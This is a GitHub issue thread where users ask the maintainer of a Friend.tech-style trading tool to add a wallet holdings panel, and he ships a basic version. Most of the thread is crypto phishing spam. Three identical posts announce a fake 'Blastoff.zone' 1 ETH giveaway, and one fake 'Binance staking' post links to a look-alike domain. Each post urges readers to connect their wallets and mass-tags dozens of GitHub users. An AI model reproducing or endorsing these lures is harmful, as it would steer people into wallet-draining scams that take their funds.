### ISSUE TITLE
Wallet holdings

### ISSUE THREAD

**Issue by profishional** [Anish-Agnihotri/friendmex#2]
Hey @Anish-Agnihotri 
Would it be possible to display the shares you hold in a panel? Like a portfolio essentially.
🙏

**Comment by proofofjake** [comment]
YESSS PLEASEEEEE I NEEEEDDDDD THISSSSS I BEGGG

**Comment by Anish-Agnihotri** [comment]
Makes sense, give me 20m

**Comment by Anish-Agnihotri** [comment]
Pushed, should be live in a second. Adds just address => balance mapping but can expand to have PnL, etc.

LMK what else would be useful and I'll add.

**Comment by profishional** [comment]
Amazing, looks good! Thank you

**Comment by felixovelar** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
sushipan, @lucienlo, @jasonz88, @Filin3, @schuppi2, @Skytale, @TivonChen, @feculay, @ThWt, @Ablayelo, @shsl, @aum2024, @zheng-bin, @elkpi, @mengguang, @MarcusDev567, @dakk, @Dub22, @fast8888, @benletchford, @imyip, @Daddysharks949, @RealAtix, @nwillemse, @13860927233, @huangkaiqiao, @Ju8z, @tabalt, @komete4, @chai2010, @jiahao1889, @mishafrenkel, @ubogdan, @shlavik, @qlbnb, @Schepses, @aspirewit, @toanalien, @jetaweb, @pm1122, @pasystem, @geogeo1, @chriswerstiuk, @nntaoli, @jrischma, @sguilford, @MaximKiselev, @ryanwkan, @narayanr7, @peizihui

**Comment by upccjesse** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
theDefiBat, @dtlehrer, @Mastervzlomov, @MadhavShah, @UmedJadhav, @surajvelip, @dawksh, @sarmatdev, @DebiFaye, @Sayan-Maity, @HemanthPaila, @mmdhrumil, @georgerobescu, @hihiboss, @mxmnci, @Avidlearner001, @kerlos, @Elemino, @wagministr, @PatelYash7, @adityabarodiya, @rakeshkumar1019, @Meyazhagan, @gdois, @kundanmunda5, @raviraushanweb, @danBamikiya, @beautyfree, @Byk35, @Keyurkd, @sol-mocha, @ducktype, @Anantharajus, @Ashish-3000, @kapildadhich075, @abhishektilkar, @geduardcatalindev, @Saqlaen, @nc1337, @wagminister, @ovbutt, @Grateful55, @lingcoder, @mayank8029, @Phonbopit, @Subas-mohanty, @bmstar2012, @dotdwebo, @TonicBoomerKewl, @AppServiceProvider

**Comment by upccjesse** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
thatbreezedev, @devyuhan, @Wert1996, @adilcpm, @klevlen, @nickbalestra, @yuki-js, @jlugaro, @Maverick9081, @124t, @ascendantaditya, @0xtristan, @richiebijoy, @philosphi, @Anish-Agnihotri, @RusseII, @ezaruba, @liqwik, @Sandalots, @Abd010, @codebender828, @Farzzn, @mxinyi, @SaratAngajalaoffl, @kelonye, @fanyilun0, @KTruong008, @Imdormi, @jordanlepera, @nkootstra, @Nanak360, @unixpi, @kaustubh43, @ngarnica23, @clarkezone, @gooshi1, @anaMaya57, @phuongwd, @likhonsible, @b1xt, @rsharvesh16, @deiondz, @mattdeco, @ri-dev-git, @iSouvikKhan, @enzotar, @vadorovsky, @g153xx, @0xqd, @ibrixxx

**Comment by DavidMStraub** [comment]
## 🚀 Double Your ETH with Binance Staking

Earn rewards and secure your financial future by staking your ETH with Binance. By participating in the Binance staking program, you can potentially double your ETH while supporting the blockchain network.

[![Start Staking Now](https://miro.medium.com/v2/resize:fit:720/format:webp/1*Ssf-ZH2f2V5dLyn7zYTXHg.png)](https://app.bnbinchain.com/en/bnb-staking?utm_source=email&utm_campaign=leads&utm_id=github)

**Click the banner above** to learn more and start staking your ETH with Binance today!

### How to Stake on Binance:
1. **[Visit the Official Binance Staking Page](https://app.bnbinchain.com/en/bnb-staking?utm_source=email&utm_campaign=leads&utm_id=github):** Click the link to navigate to the official staking page.
2. **Connect Your Wallet:** Ensure you have a wallet with sufficient ETH, then securely connect it to Binance.
3. **Interact with the Staking Method:** Follow the instructions to use the "connect" method and begin staking your ETH from your wallet balance.
xmc2, @Aroundight, @avi1mizrahi, @0x4E33, @dkrupiza, @bianhaiming, @bizzyvinci, @robinfang, @xxxxxxxxxxx123, @trinhhungfischer, @Amanda-WangXiao, @greyjoeyzhou, @andreystarkov, @zhangtaotaoBTC, @chbharath, @phdkiran, @drhall-ua, @alikonuk1, @Jackneill, @DominikTo, @TheDAS-designer, @walleWorks, @ChrisTorresLugo, @rex5207, @dwasse, @zie225, @shivenmian, @lispmind, @ryanmac, @YessineAmor, @phyyou, @anselumana, @0xAshish, @ChefSnoopy, @fpecek, @hitdavid, @ZQ1001-AI, @fdecollibus, @benjamin-wei, @tboeckmann, @meiji163, @0xdagarn, @klin-ledger, @adityaaggarwal12, @redaready, @motchang, @antonyip, @guye1296, @gitwinst, @Kamalabot
